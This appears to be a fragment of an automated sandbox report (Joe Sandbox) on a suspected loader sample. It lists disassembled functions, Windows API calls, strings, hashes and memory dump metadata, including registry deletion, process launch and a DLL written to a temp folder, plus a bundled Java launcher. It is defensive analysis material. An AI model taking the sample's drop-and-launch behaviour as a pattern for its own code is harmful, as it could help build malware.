                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                                • Opcode ID: d07c36abb5cc3f5c488be6aff3aaa99d8dce3c6af4fcc367b11ea24b6a0b7be7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d07c36abb5cc3f5c488be6aff3aaa99d8dce3c6af4fcc367b11ea24b6a0b7be7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000,00000011), ref: 00402CAA
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,00000000,?,?,00000000,00000011), ref: 00402CCC
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402C97, 00402CC0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileWritelstrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 427699356-3145118107
                                                                                                                                                                                                                                                                                                                • Opcode ID: 55486fcf8e651e727bb483dec04ca9597feabbd23016b763e615125cc29686d5
                                                                                                                                                                                                                                                                                                                • Instruction ID: c506515b4f3882524b3727819370815232dade3b70b13ac55afc9f5c9595d706
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55486fcf8e651e727bb483dec04ca9597feabbd23016b763e615125cc29686d5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF08972644201EBDB14EFB1DD45AEF7668DB00309B10843FF103F20D2D67D8A81966D
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"), xrefs: 004062D1, 004062D6
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\")
                                                                                                                                                                                                                                                                                                                • API String ID: 3509786178-1912999109
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:23.2%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:3.9%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:686
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:13

Callgraph

[Figure: function call graph. Legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

Control-flow Graph

[Figure: control-flow graph of the function at 405d30. Legend: Executed, Not Executed]
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: ModuleResource$Handle$AddressCurrentFileFindLoadLockNameProcProcessfprintfmemsetstrrchr
• String ID: -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$-Xms$-Xmx$An error occurred while starting the application.$Args length:%d/32768 chars$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Error:%s$Instance already exists.$IsWow64Process$Laun$Launcher args:%s$Launcher:%s$Resource %d:%s$Startup error message not defined.$WOW64:%s$Working dir:%s$\bin$appendToPathVar failed.$bin\java.exe$bin\javaw.exe$ch4j$yes
• API String ID: 919401838-1088111942
• Opcode ID: e98f0b280fdfade851ebe13318b98efc7c14c0c3f0ba294e535c625494688a31
• Instruction ID: bf9eff1d8a15de45e5a137a0cf06cc9be9fda6a92e4b939ea636d94b2118cc52
• Opcode Fuzzy Hash: e98f0b280fdfade851ebe13318b98efc7c14c0c3f0ba294e535c625494688a31
• Instruction Fuzzy Hash: 6A521EB09087018BD714EF29D58025EBBE1EF84344F15C87FE889AB391DB7C89658F4A

Control-flow Graph

[Figure: control-flow graph of the function at 404740. Legend: Executed, Not Executed]
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: Resource$FindLoadLock$fprintf$ErrorLaststrchrstrcpystrlen
• String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$Runtime used:%s (%s-bit)$true
• API String ID: 1095060389-161049339
• Opcode ID: 1e1ebbd2596e796659a365ff710677ee0d78a079d6b67fc0678fadb0c843e369
• Instruction ID: 877def55760d6699fa8b0a675f498fd38e355f95ffd6f34839a3e279e3ce58b8
• Opcode Fuzzy Hash: 1e1ebbd2596e796659a365ff710677ee0d78a079d6b67fc0678fadb0c843e369
• Instruction Fuzzy Hash: 70225DB4A083019BD700AF65D64435FBBE1AB84344F01C87FE989AB3C2D77C9955DB8A

Control-flow Graph

[Figure: control-flow graph of the function at 4013b0. Legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D30: GetModuleHandleA.KERNEL32(?,004013C7), ref: 00405D4D
                                                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 0040140E
                                                                                                                                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 004014B1
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32 ref: 004014FA
                                                                                                                                                                                                                                                                                                                • GetMessageA.USER32 ref: 00401572
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401ED7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: puts.MSVCRT ref: 00401F11
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: ShellExecuteA.SHELL32 ref: 00401F5A
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32 ref: 0040189A
                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32 ref: 004018A5
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
